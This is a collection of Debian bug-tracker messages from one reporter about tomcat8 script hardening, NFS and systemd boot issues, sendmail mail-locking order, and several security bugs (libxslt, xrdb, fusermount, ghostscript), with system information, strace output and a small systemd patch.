The script should be made more robust by using "chown -h". (This would
protect against the above attack.)
The script should use plain mkdir without "-p": not needed as we create
a single directory, and should not be used to let mkdir return failure.
(This may make it safe.)
Cheers, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
-- System Information:
Debian Release: 8.6
APT prefers stable
APT policy: (500, 'stable')
Architecture: i386 (x86_64)
Kernel: Linux 3.16.36-pk07.24-amd64 (SMP w/2 CPU cores)
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Init: systemd (via /run/systemd/system)
Versions of packages tomcat8 depends on:
ii adduser3.113+nmu3
ii debconf [debconf-2.0] 1.5.56
ii tomcat8-common 8.0.14-1+deb8u3
ii ucf3.0030
Versions of packages tomcat8 recommends:
pn authbind
Versions of packages tomcat8 suggests:
pn libtcnative-1
pn tomcat8-admin
pn tomcat8-docs
pn tomcat8-examples
pn tomcat8-user
-- Configuration Files:
/etc/init.d/tomcat8 changed [not included]
/etc/tomcat8/catalina.properties [Errno 13] Permission denied:
u'/etc/tomcat8/catalina.properties'
/etc/tomcat8/context.xml [Errno 13] Permission denied:
u'/etc/tomcat8/context.xml'
/etc/tomcat8/logging.properties [Errno 13] Permission denied:
u'/etc/tomcat8/logging.properties'
/etc/tomcat8/policy.d/01system.policy [Errno 13] Permission denied:
u'/etc/tomcat8/policy.d/01system.policy'
/etc/tomcat8/policy.d/02debian.policy [Errno 13] Permission denied:
u'/etc/tomcat8/policy.d/02debian.policy'
/etc/tomcat8/policy.d/03catalina.policy [Errno 13] Permission denied:
u'/etc/tomcat8/policy.d/03catalina.policy'
/etc/tomcat8/policy.d/04webapps.policy [Errno 13] Permission denied:
u'/etc/tomcat8/policy.d/04webapps.policy'
/etc/tomcat8/policy.d/50local.policy [Errno 13] Permission denied:
u'/etc/tomcat8/policy.d/50local.policy'
/etc/tomcat8/server.xml [Errno 13] Permission denied: u'/etc/tomcat8/server.xml'
/etc/tomcat8/tomcat-users.xml [Errno 13] Permission denied:
u'/etc/tomcat8/tomcat-users.xml'
/etc/tomcat8/web.xml [Errno 13] Permission denied: u'/etc/tomcat8/web.xml'
-- debconf information excluded
Bug#775541: NFS mounts fail at boot after Debian 8.5 upgrade
Dear Vincent, > Could you provide a bit more information about the package versions > on your system? > dpkg -l rpcbind nfs-common nfs-kernel-server systemd psz@como:~$ dpkg -l rpcbind nfs-common nfs-kernel-server systemd Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version Architecture Description +++-=-=-=-=== ii nfs-common1:1.2.8-9 i386 NFS support files common to client and server ii nfs-kernel-server 1:1.2.8-9 i386 support for NFS kernel server ii rpcbind 0.2.1-6+deb8u1i386 converts RPC program numbers into universal addresses ii systemd 215-17+deb8u4.psz i386 system and service manager The systemd packages are my "own", with my (trivial!) patches as per https://bugs.debian.org/803013 > Also I think the output of these commands would be helpful > systemd-analyze critical-path remote-fs-pre.target > systemd-analyze critical-path nfs-kernel-server.service I think you meant critical-chain: psz@como:~$ systemd-analyze critical-chain remote-fs-pre.target ... remote-fs-pre.target @98ms psz@como:~$ systemd-analyze critical-chain nfs-kernel-server.service ... nfs-kernel-server.service +223ms basic.target @4.819s timers.target @4.818s systemd-tmpfiles-clean.timer @4.818s sysinit.target @4.816s console-setup.service @4.813s +1ms kbd.service @4.753s +58ms system.slice @108ms -.slice @103ms Cheers, Paul
Bug#775541: NFS mounts fail at boot after Debian 8.5 upgrade
After upgrading from Debian jessie 8.4 to 8.5, my NFS mounts in fstab failed at boot (or reboot) time. To fix, I changed the one file /lib/systemd/system/remote-fs-pre.target adding the line After=rpcbind.target then my NFS mounts work correctly. Question: should I have used After=rpcbind.service instead? Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#803013: systemd should not destroy application created cgroups
Package: systemd
Version: 215-17+deb8u2
Severity: critical
Tags: patch
Justification: breaks unrelated software
If you use cgroups, then systemd will on occasions destroy your
settings. To reproduce:
- Set up cgroups e.g. adding TaskIDs to /sys/fs/cgroup/cpu/DIR/tasks
files. (I use cgrulesengd from package cgroup-tools, but any other
use of cgroups is equally affected.)
- Then when you use systemd commands:
systemctl daemon-reload
systemctl start anacron
you will see your cgroups (your tasks files) becoming empty.
Command daemon-reload seems to happen within "apt-get dist-upgrade"
sequences, and "start anacron" happens nightly. (Some other systemd
commands may also affect.)
I propose the attached patch to avoid the issue. This patch seems to work
well for me.
Cheers, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
-- Package-specific info:
-- System Information:
Debian Release: 8.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: i386 (x86_64)
Kernel: Linux 3.16.7-ckt11-pk07.12-amd64 (SMP w/8 CPU cores)
Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Init: systemd (via /run/systemd/system)
Versions of packages systemd depends on:
ii acl 2.2.52-2
ii adduser 3.113+nmu3
ii initscripts 2.88dsf-59
ii libacl1 2.2.52-2
ii libaudit1 1:2.4-1+b1
ii libblkid1 2.25.2-6
ii libc6 2.19-18+deb8u1
ii libcap2 1:2.24-8
ii libcap2-bin 1:2.24-8
ii libcryptsetup4 2:1.6.6-5
ii libgcrypt20 1.6.3-2
ii libkmod218-3
ii liblzma55.1.1alpha+20120614-2+b3
ii libpam0g1.1.8-3.1
ii libselinux1 2.3-2
ii libsystemd0 215-17+deb8u2
ii mount 2.25.2-6
ii sysv-rc 2.88dsf-59
ii udev215-17+deb8u2
ii util-linux 2.25.2-6
Versions of packages systemd recommends:
ii dbus1.8.20-0+deb8u1
ii libpam-systemd 215-17+deb8u2
Versions of packages systemd suggests:
pn systemd-ui
-- no debconf information
diff -r -U12 a/src/shared/cgroup-util.c b/src/shared/cgroup-util.c
--- a/src/shared/cgroup-util.c 2015-10-25 07:16:24.0 +1100
+++ b/src/shared/cgroup-util.c 2015-10-26 06:03:25.0 +1100
@@ -281,24 +281,34 @@
int cg_migrate(const char *cfrom, const char *pfrom, const char *cto, const char *pto, bool ignore_self) {
bool done = false;
_cleanup_set_free_ Set *s = NULL;
int r, ret = 0;
pid_t my_pid;
assert(cfrom);
assert(pfrom);
assert(cto);
assert(pto);
+/*
+ * PSz 25 Oct 2015
+ * An empty "to" path is surely wrong (do not annoy cgroups that not ours)
+ */
+if (!strlen(pto)) {
+/* log_warning("Debug: cg_migrate skip from (%s)%s to (%s)%s", cfrom, pfrom, cto, pto); */
+return ret;
+}
+/* log_warning("Debug: cg_migrate do from (%s)%s to (%s)%s", cfrom, pfrom, cto, pto); */
+
s = set_new(trivial_hash_func, trivial_compare_func);
if (!s)
return -ENOMEM;
my_pid = getpid();
do {
_cleanup_fclose_ FILE *f = NULL;
pid_t pid = 0;
done = true;
r = cg_enumerate_processes(cfrom, pfrom, &f);
Bug#684645: liblockfile1: Order of fcntl and dotlock in maillock
Dear Michael, I guess that lockmbox() should not be called on entry to deliver(), but that block moved to after the first flock(). I wonder about the close(mbfd) in line 1370: should unlockmbox() be called just after, and lockmbox() called again after the re-open and subsequent flock()? --- I wonder if I am qualified to provide patches. What has me stumped is that I do not seem to be able to build sendmail-bin. Trying: tar zxf sendmail.8.14.4.tar.gz gzcat sendmail_8.14.4-2.1.diff.gz | patch -p0 cd sendmail-8.14.4 dpkg-buildpackage -rfakeroot -B -uc -us elicits some errors: ... fakeroot debian/rules clean /usr/share/cdbs/1/rules/tarball.mk:33: WARNING: tarball.mk is deprecated - please use source format 3.0 instead /bin/sh: line 0: cd: build-tree/sendmail-8.14.4: No such file or directory ... dh_testroot rm -f debian/stamp-makefile-build debian/stamp-makefile-install k distclean make: k: Command not found ... cd build-tree/sendmail-8.14.4 && QUILT_PATCHES=/usr/users/amstaff/psz/sendmail-bin/sendmail-8.14.4/debian/patches/8.14/8.14.4 quilt --quiltrc /dev/null push -a || test $? = 2 Applying patch control_c can't find file to patch at input line 24 ... make: *** [debian/stamp-patched] Error 1 dpkg-buildpackage: error: debian/rules build-arch gave error exit status 2 Can you give me a hint on what I am doing wrong? Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#648941: /usr/lib/sm.bin/mail.local: Uses flock, not fcntl
Dear Tobias, I submitted http://bugs.debian.org/684645 against liblockfile1. But then I realized that liblockfile is fine and that the bug must be within mail.local sources, so I re-assigned that bug to sendmail-bin. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#684645: /usr/lib/sm.bin/mail.local: Order of fcntl and dotlock in maillock
reassign 684645 sendmail-bin 8.14.4-2.1
thanks
Hmm... comparing with an strace of /usr/bin/bsd-mailx, shows that mailx
uses liblockfile and does:
open("/var/mail/psz", O_RDWR) = 3
fcntl64(3, F_SETLKW, {type=F_WRLCK, whence=SEEK_CUR, start=0, len=0}) = 0
link("/var/mail/.lk128035p639", "/var/mail/psz.lock") = 0
in the "right" order. This suggests that liblockfile is fine.
I thus suppose that mail.local only "pretends" to use liblockfile and
maillock(), but that in fact it does its own locking, this bug being
entirely in the sendmail-bin sources. - Such "pretence" was noted
previously, in the initial report of http://bugs.debian.org/648941 .
Cheers, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#684645: liblockfile1: Order of fcntl and dotlock in maillock
Package: liblockfile1
Version: 1.09-4
Severity: serious
Justification: Policy 11.6
Debian policy
http://www.debian.org/doc/debian-policy/ch-customized-programs.html#s-mail-transport-agents
says:
... fcntl() locking must be combined with dot locking.
To avoid deadlocks, a program should use fcntl() first
and dot locking after this, or alternatively implement
the two locking methods in a non blocking way. Using
the functions maillock and mailunlock provided by the
liblockfile* packages is the recommended way to
realize this.
Looking at an strace of /usr/lib/sm.bin/mail.local it seems to use
/usr/lib/i386-linux-gnu/liblockfile.so.1 and shows:
link("/var/mail/.lk10336dp639", "/var/mail/psz.lock") = 0
open("/var/mail/psz", O_WRONLY|O_APPEND) = 4
fcntl64(4, F_SETLKW, {type=F_WRLCK, whence=SEEK_CUR, start=0, len=0}) = 0
which seems the wrong order.
Please see http://bugs.debian.org/648941 also.
Thanks, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
-- System Information:
Debian Release: wheezy/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 3.2.21-pk06.02-i386 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash
Versions of packages liblockfile1 depends on:
ii libc6 2.13-33
ii liblockfile-bin1.09-4
ii multiarch-support 2.13-33
liblockfile1 recommends no packages.
liblockfile1 suggests no packages.
-- no debconf information
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#648941: /usr/lib/sm.bin/mail.local: Uses flock, not fcntl
Dear Tobias, > Well, I don't know. I just saw that "Uses flock, not fcntl" is fixed. And I guess that was the main issue, leading to file corruption. Thanks for letting me know. > You could retitle the bug or create a new one to track the order issue. I wonder whether that bug is in sendmail-bin or maybe elsewhere. Assuming the latter, I will now submit a new bug against liblockfile1. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#648941: /usr/lib/sm.bin/mail.local: Uses flock, not fcntl
Dear Tobias,
> fixed 648941 8.14.4-2.1
> This is fixed in Wheezy.
Is it, really? The policy says:
... fcntl() locking must be combined with dot locking. To avoid
deadlocks, a program should use fcntl() first and dot locking after
this ...
whereas strace shows:
link("/var/mail/.lk10336dp639", "/var/mail/psz.lock") = 0
open("/var/mail/psz", O_WRONLY|O_APPEND) = 4
fcntl64(4, F_SETLKW, {type=F_WRLCK, whence=SEEK_CUR, start=0, len=0}) = 0
which seems the wrong order.
Thanks, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#648941: /usr/lib/sm.bin/mail.local: Uses flock, not fcntl
Package: sendmail-bin
Version: 8.14.3-9.4
Severity: serious
File: /usr/lib/sm.bin/mail.local
Justification: Policy 11.6
Using strace I see that mail.local uses flock:
open("/var/mail/psz", O_WRONLY|O_APPEND) = 4
flock(4, LOCK_EX) = 0
(as well as a /var/mail/psz.lock file).
This is against Debian policy: looking in
http://www.debian.org/doc/debian-policy/ch-customized-programs.html#s-mail-transport-agents
I see "... fcntl() locking must be ...". Curiously, mail.local accesses
(but does not use?) /usr/lib/liblockfile.so.1 also.
This bug may permit corruption of mail files, and in fact observed on
rare occasions.
Please see http://bugs.debian.org/513298 also.
Thanks, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
-- Package-specific info:
Ouput of /usr/share/bug/sendmail-bin/script:
ls -alR /etc/mail:
/etc/mail:
total 106
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 .
drwxr-xr-x 161 root root 10240 Nov 16 15:32 ..
-rwxr-xr-- 1 root smmsp 8043 Jul 14 08:15 Makefile
-rw--- 1 root root 4261 Jul 14 06:42 access
-rw-r- 1 smmta smmsp 3072 Dec 22 2009 access.db
-rw-r--r-- 1 root smmsp 0 Dec 22 2009 aliases
-rw-r- 1 smmta smmsp 3072 Jul 14 07:01 aliases.db
-rw-r--r-- 1 root smmsp 2804 Jul 14 08:15 databases
-rw-r--r-- 1 root root 5657 Jul 17 2008 helpfile
-rw-r--r-- 1 root smmsp33 Dec 22 2009 local-host-names
drwxr-sr-x 2 smmta smmsp 1024 Dec 22 2009 m4
drwxr-xr-x 2 root root 1024 Jul 14 06:40 peers
drwxr-xr-x 2 root smmsp 1024 Jul 16 2008 sasl
-rw-r--r-- 1 root smmsp 8591 Jul 14 07:01 sendmail.cf
-rw-r--r-- 1 root root 8591 Jul 14 06:42 sendmail.cf.old
-rw-r--r-- 1 root root 10032 May 6 2002 sendmail.conf
-rw-r--r-- 1 root smmsp46 Jul 14 07:01 sendmail.mc
drwxr-sr-x 2 smmta smmsp 1024 Dec 22 2009 smrsh
lrwxrwxrwx 1 root root 15 Dec 23 2009 spamassassin -> ../spamassassin
-rw-r--r-- 1 root smmsp 7947 Jul 14 07:01 submit.cf
-rw-r--r-- 1 root smmsp55 Jul 14 06:42 submit.cf.errors
-rw-r--r-- 1 root root 7947 Jul 14 06:42 submit.cf.old
-rw-r--r-- 1 root smmsp59 Jul 14 07:01 submit.mc
drwxr-xr-x 2 smmta smmsp 1024 Dec 22 2009 tls
-rw-r--r-- 1 root smmsp 0 Dec 22 2009 trusted-users
/etc/mail/m4:
total 2
drwxr-sr-x 2 smmta smmsp 1024 Dec 22 2009 .
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..
-rw-r- 1 root smmsp0 Dec 22 2009 dialup.m4
-rw-r- 1 root smmsp0 Dec 22 2009 provider.m4
/etc/mail/peers:
total 2
drwxr-xr-x 2 root root 1024 Jul 14 06:40 .
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..
/etc/mail/sasl:
total 2
drwxr-xr-x 2 root smmsp 1024 Jul 16 2008 .
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..
/etc/mail/smrsh:
total 2
drwxr-sr-x 2 smmta smmsp 1024 Dec 22 2009 .
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..
lrwxrwxrwx 1 root smmsp 26 Dec 22 2009 mail.local ->
/usr/lib/sm.bin/mail.local
lrwxrwxrwx 1 root smmsp 17 Dec 22 2009 procmail -> /usr/bin/procmail
lrwxrwxrwx 1 root smmsp 17 Dec 22 2009 vacation -> /usr/bin/vacation
/etc/mail/tls:
total 23
drwxr-xr-x 2 smmta smmsp 1024 Dec 22 2009 .
drwxr-sr-x 7 smmta smmsp 1024 Jul 14 07:01 ..
-rw-r--r-- 1 root root 7 Dec 22 2009 no_prompt
-rw--- 1 root root 1191 Dec 22 2009 sendmail-client.cfg
-rw-r--r-- 1 root smmsp 1249 Dec 22 2009 sendmail-client.crt
-rw--- 1 root root 1025 Dec 22 2009 sendmail-client.csr
-rw-r- 1 root smmsp 1675 Dec 22 2009 sendmail-common.key
-rw-r- 1 root smmsp 1582 Dec 22 2009 sendmail-common.prm
-rw--- 1 root root 1191 Dec 22 2009 sendmail-server.cfg
-rw-r--r-- 1 root smmsp 1249 Dec 22 2009 sendmail-server.crt
-rw--- 1 root root 1025 Dec 22 2009 sendmail-server.csr
-rwxr--r-- 1 root root 3262 Jul 14 06:42 starttls.m4
sendmail.conf:
DAEMON_MODE="Daemon";
DAEMON_PARMS="";
DAEMON_HOSTSTATS="Yes";
DAEMON_MAILSTATS="No";
QUEUE_MODE="${DAEMON_MODE}";
QUEUE_INTERVAL="10";
QUEUE_PARMS="";
MSP_MODE="${QUEUE_MODE}";
MSP_INTERVAL="${QUEUE_INTERVAL}";
MSP_PARMS="${QUEUE_PARMS}";
MSP_MAILSTATS="No";
MISC_PARMS="";
CRON_MAILTO="root";
CRON_PARMS="";
AGE_DATA="";
DAEMON_STATS="${DAEMON_MAILSTATS}";
MSP_STATS="${MSP_MAILSTATS}";
sendmail.mc:
[trigger for usr/share/sendmail/sm_helper.sh]
submit.mc...
FEATURE(`msp [trigger for usr/share/sendmail/sm_helper.sh]
-- System Information:
Debian Release: 6.0.3
APT prefers stable
APT policy: (500, 'stable')
Architecture: i386 (i686)
Kernel: Linux 2.6.32-pk05.09-svr (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash
Versions of packages sendmail-bin depends on:
ii libc6
Bug#621691: libxslt1.1: XML Security Library "xslt.c" Arbitrary File Access
Package: libxslt1.1 Version: 1.1.24-2 Severity: grave Tags: security Justification: user security hole Please note messages: http://www.sans.org/newsletters/risk/display.php?v=10&i=14#11.15.18 http://www.aleksey.com/pipermail/xmlsec/2011/009120.html Seems to me that Debian is affected. (I do not use XML so did not verify.) Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.8 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Kernel: Linux 2.6.32-pk04.09-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages libxslt1.1 depends on: ii libc6 2.7-18lenny7 GNU C Library: Shared libraries ii libgcrypt11 1.4.1-1 LGPL Crypto library - runtime libr ii libxml2 2.6.32.dfsg-5+lenny3 GNOME XML library libxslt1.1 recommends no packages. libxslt1.1 suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#621423: /usr/bin/xrdb: xdmcp rogue hostname security
Package: x11-xserver-utils Version: 7.3+5 Severity: critical File: /usr/bin/xrdb Tags: security Justification: root security hole About the security bug in xrdb : http://security-tracker.debian.org/tracker/CVE-2011-0465 http://www.ubuntu.com/usn/usn-1107-1 https://bugs.launchpad.net/ubuntu/+source/x11-xserver-utils/+bug/752315 http://lists.freedesktop.org/archives/xorg-announce/2011-April/001636.html http://cgit.freedesktop.org/xorg/app/xrdb/commit/?id=1027d5df07398c1507fb1fe3a9981aa6b4bc3a56 http://www.securityfocus.com/bid/47189 As I understand, the result of a breach would be root access on the server. Debian seems to have flagged this as low priority because xdmcp is not enabled in default setup; though the issue is exploitable via dhcp also. In my environment we use xdmcp for users to log in to our servers. Could I please have ideas about workaround protection? I know that gdm uses /etc/hosts.allow and there I added the lines: ALL : UNKNOWN : twist /bin/echo 'No name "%n" for address "%a" -\r\n May be DNS failure - Please try again later' ALL : PARANOID : twist /bin/echo 'Name "%n" and address "%a" mismatch -\r\n May be DNS failure - Please try again later' gdm : all : allow However I notice that gdm uses IP address only, not hostname when evaluating hosts.allow lines, so I wonder about the effectiveness of this protection. How would I test whether my setup is vulnerable? Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.8 APT prefers oldstable APT policy: (500, 'oldstable') Architecture: i386 (i686) Kernel: Linux 2.6.32-pk04.09-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages x11-xserver-utils depends on: ii cpp 4:4.3.2-2The GNU C preprocessor (cpp) ii libc6 2.7-18lenny7 GNU C Library: Shared libraries ii libice6 2:1.0.4-1X11 Inter-Client Exchange library ii libsm6 2:1.0.3-2X11 Session Management library ii libx11-62:1.1.5-2X11 client-side library ii libxau6 1:1.0.3-3X11 authorisation library ii libxaw7 2:1.0.4-2X11 Athena Widget library ii libxext62:1.0.4-2X11 miscellaneous extension librar ii libxi6 2:1.1.4-1X11 Input extension library ii libxmu6 2:1.0.4-1X11 miscellaneous utility library ii libxmuu12:1.0.4-1X11 miscellaneous micro-utility li ii libxrandr2 2:1.2.3-1X11 RandR extension library ii libxrender1 1:0.9.4-2X Rendering Extension client libra ii libxt6 1:1.0.5-3X11 toolkit intrinsics library ii libxtrap6 2:1.0.0-5X11 event trapping extension libra ii libxxf86misc1 1:1.0.1-3X11 XFree86 miscellaneous extensio ii libxxf86vm1 1:1.0.2-1X11 XFree86 video mode extension l ii x11-common 1:7.3+20 X Window System (X.Org) infrastruc x11-xserver-utils recommends no packages. x11-xserver-utils suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#602333: /usr/bin/fusermount: fusermount allows unmount any filesystem
Ubuntu claims to have this fixed: https://bugs.launchpad.net/bugs/670622 http://www.ubuntu.com/usn/usn-1045-1 http://www.ubuntu.com/usn/usn-1045-2 Last two references not yet available, see https://lists.ubuntu.com/archives/ubuntu-security-announce/2011-January/date.html instead. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584653: RC bugs in upcoming stable
Arne mentioned http://security-tracker.debian.org/tracker/CVE-2010-2055 and in there, I see: - Bug #592569 is referenced. Surely wrong: that CVE pre-dates my request to make -dSAFER the default, was about -P- and similar. - "experimental 9.00~dfsg-2 vulnerable" whereas bugs #584653 and #584663 are marked "Fixed in version 9.00~dfsg-1". Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584653: ghostscript: does not honor -P- option
Dear Mehdi, > We prefer targeted fixes ... > ... we won't be able to review [gs 9.00] or accept it ... Supposing that those "targeted fixes" may not happen. Would you then release gs 8.71 with a grave (= RC) bug? Or would you drop gs, or delay squeeze? I am genuinely curious. Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: imagemagick uses gs without -P-
Dear Jonas, Sorry, but do not understand. >>Too late now for [#583183] ... I now noticed that imagemagick >>also uses gs, and invokes it with -dPARANOIDSAFER but without -P-. > > Do *NOT* "cross-post" bug info between bugreports! ... > You do *not* help if "spamming" the bugreports. :-( I wanted to point out in this bug #584663 that imagemagick is affected by it. Only in passing I bemoaned the fact that the "definitive list" of affected packages cannot be updated in #583183. > ... the treatment of the issue did not go to your liking. Most of the issues are OK now, I am happy. Fixes in place... except, not certain yet whether the fix will make it into squeeze (why not into lenny, via a DSA? lesser issues were given DSAs); and -dSAFER is not yet a default, but that is "not this bug" (so I did not mention it here). I do apologize if I misunderstood something, and done the wrong thing yet again. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: imagemagick uses gs without -P-
Too late now for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=583183#54 (as that is archived, un-changeable). I now noticed that imagemagick also uses gs, and invokes it with -dPARANOIDSAFER but without -P-. Good thing this bug is now "fixed". (I will not report a bug against imagemagick, no need for more "mass bug filing".) Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#602333: /usr/bin/fusermount: fusermount allows unmount any filesystem
Ubuntu has now added the reference CVE-2010-3879 to https://bugs.launchpad.net/bugs/670622 and marked in "confirmed". Other interesting references: https://bugzilla.redhat.com/show_bug.cgi?id=651183 https://bugzilla.novell.com/show_bug.cgi?id=651598 Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584663: Bug#584653: Patch to close CVE-2010-2055
Dear Jonas, >>> deb http://debian.jones.dk/ squeeze printing >> >>I have now upgraded a machine to squeeze and tried your >>ghostscript 9.00~dfsg-1~0jones1 >>package, it works perfectly, thanks. >>[snip] >>Seems to me that in your package, the default is -P- (not -P). >>Should not this be mentioned in bug #584663 ? > > It seems that you are more knowledgeable in that bug than me, and I > would appreciate your judgement: > > Do you mean to say that bug#584663 is closed too with upstream release > 9.00? Yes. Compare the outputs of commands (sorry long lines, may wrap): strace -o x.out /usr/bin/gs -P- x.ps >/dev/null 2>&1; grep -E '^(open|stat|access)' x.out | grep -E -v '"/(usr|etc|var|lib)/' strace -o x.out /usr/bin/gs x.ps >/dev/null 2>&1; grep -E '^(open|stat|access)' x.out | grep -E -v '"/(usr|etc|var|lib)/' strace -o x.out /usr/bin/gs -P x.ps >/dev/null 2>&1; grep -E '^(open|stat|access)' x.out | grep -E -v '"/(usr|etc|var|lib)/' The first two are identical: attempt to load various things from "proper" places only, not current dir. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584653: Patch to close CVE-2010-2055
Dear Julien, >> Will this make it into squeeze? ... > See the version graph at > http://bugs.debian.org/584653 > The affected versions seem to be marked correctly. What I was asking... When the squeeze release is being put together and they look at ghostscript, will they say: 1 - The bug is done, ghostscript is OK. 2 - Version 8.71 has a grave i.e. RC bug, must upgrade to 9.00. (or something else)? Your reply suggests that they will choose "2", in effect assuring me that this will make it into squeeze. Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584653: Patch to close CVE-2010-2055
